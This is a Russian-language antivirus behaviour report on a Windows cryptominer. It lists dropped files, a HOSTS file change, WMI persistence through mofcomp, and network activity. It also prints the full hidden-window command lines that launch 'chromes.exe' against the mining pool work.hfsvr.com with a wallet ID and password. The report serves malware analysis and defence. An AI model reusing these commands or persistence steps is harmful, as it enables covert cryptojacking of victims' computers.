Техническая информация
Изменения в файловой системе
Создает следующие файлы
- %WINDIR%\syswow64\wbem\log6.tmp
- %WINDIR%\temp\chromes.exe
Удаляет следующие файлы
- %WINDIR%\syswow64\wbem\log6.tmp
Изменяет файл HOSTS.
Сетевая активность
TCP
- '47.##.58.130':80
Другое
Создает и запускает на исполнение
- '%WINDIR%\temp\chromes.exe' -o work.hfsvr.com:80 -u 810411112721112285231324162422250326312801292 -p WCsGHxbkKWuXKqZJACaiSKrtTqnUwRkFaSgxhpaiMKLKSqSZTzHDTEYPgXxNhooNjBVPLjHTqTZKMDdiuQf -a rx/0 --cpu-max-threads-hint 75
- '%WINDIR%\syswow64\cmd.exe' /c %WINDIR%\TEMP\chromes.exe -o work.hfsvr.com:80 -u 810411112721112285231324162422250326312801292 -p WCsGHxbkKWuXKqZJACaiSKrtTqnUwRkFaSgxhpaiMKLKSqSZTzHDTEYPgXxNhooNjBVPLjHTqTZKMDdiuQf -a rx/0...' (со скрытым окном)
- '%WINDIR%\syswow64\wbem\mofcomp.exe' <SYSTEM32>\wbem\log6.tmp' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\syswow64\wbem\mofcomp.exe' <SYSTEM32>\wbem\log6.tmp
- '%WINDIR%\syswow64\cmd.exe' /c %WINDIR%\TEMP\chromes.exe -o work.hfsvr.com:80 -u 810411112721112285231324162422250326312801292 -p WCsGHxbkKWuXKqZJACaiSKrtTqnUwRkFaSgxhpaiMKLKSqSZTzHDTEYPgXxNhooNjBVPLjHTqTZKMDdiuQf -a rx/0...
